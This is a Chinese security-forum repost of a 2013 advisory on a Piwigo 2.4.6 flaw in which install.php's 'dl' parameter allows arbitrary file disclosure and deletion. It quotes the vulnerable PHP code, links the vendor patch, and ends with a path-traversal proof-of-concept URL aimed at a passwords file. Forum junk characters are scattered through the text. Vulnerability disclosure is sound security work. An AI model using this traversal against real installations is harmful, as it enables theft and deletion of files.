找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2243|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。
; F4 p% G7 R0 q9 v( o6 F- Q* y& f: t( x5 }
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。3 d  w( t# M. U, P
====================================================================4 ^; Q6 z, x+ g8 a4 f& W" d
/install.php:1 z" B( H3 M* b& r" v* U4 X' M, w
-------------
4 G6 q; q5 H" T& N7 V5 o5 @+ W" R113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
) {1 r$ j. m) ~% u6 \& X114: {
" y* j" b7 E' S; s! b115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
! Y9 n; |4 C9 u- P( j8 J0 m116:   header('Cache-Control: no-cache, must-revalidate');3 s* q# }  G) k- h6 e$ H2 W) u" c
117:   header('Pragma: no-cache');, {* {. J; d% E: J3 q
118:   header('Content-Disposition: attachment; filename="database.inc.php"');/ t5 X  W5 L# t; g: c. h
119:   header('Content-Transfer-Encoding: binary');
1 S. t' C: B( U9 {( I# M120:   header('Content-Length: '.filesize($filename));9 t3 m3 b  `1 k7 o+ p
121:   echo file_get_contents($filename);
: G0 z0 g$ T- w  w4 x122:   unlink($filename);# \) t( g, `$ \/ `* M# U
123:   exit();
. D8 M) [" r1 Z- P124: }
8 ^: c# |: d# u9 i====================================================================9 n7 O' f9 ~6 g9 ]7 Z+ m; K

& {* Q+ U# k0 o# |) T" wTested on: Microsoft Windows 7 Ultimate SP1 (EN)( j3 L' f+ ^1 E% Q  |5 u0 P* ?
           Apache 2.4.2 (Win32)7 c% a1 g' z) W, Q; P+ t
           PHP 5.4.4
& i  a! W% t5 F# Q# a1 V, S* a           MySQL 5.5.25a
$ }4 \2 }, L5 s  [- }8 A5 [
6 ]0 [( _/ a6 L: vVulnerability discovered by Gjoko 'LiquidWorm' Krstic
0 d0 X' w2 v0 O% x6 E1 ~  Q                            @zeroscience8 w2 w6 T- z; x( D" U' c% i

' T1 R& c9 D0 a: SAdvisory ID: ZSL-2013-51276 n5 y! Y% L$ G# |
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php$ {# F9 h4 O" A) [5 Q
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
6 V" O+ G7 M4 s9 X7 s* u. e! j
# v/ A+ w# J6 B  c) E. f4 [4 @15.02.2013: ?' }% z3 ?& H4 l  P

7 {; a9 o; O+ q) j; n/ k% \( B--
/ ^: h8 _) V2 r) chttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt% T) ^  H. n9 B& Q) u; m) ]

# z5 {, ?) W5 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表